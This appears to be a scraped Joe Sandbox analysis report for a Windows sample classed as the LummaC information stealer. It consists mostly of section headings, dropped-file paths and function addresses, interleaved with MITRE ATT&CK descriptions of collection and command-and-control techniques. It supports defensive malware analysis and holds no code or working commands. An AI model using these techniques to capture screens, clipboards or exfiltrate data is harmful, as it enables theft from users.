Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OAKPYEH4c6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OAKPYEH4c6.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
OAKPYEH4c6.exe

Function 00A95135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 00A68720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 00A9BAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00A9C59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 00A9EEC0 Relevance: .1, Instructions: 141
COMMON

Function 00A9BC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00A9A080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 00A9483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre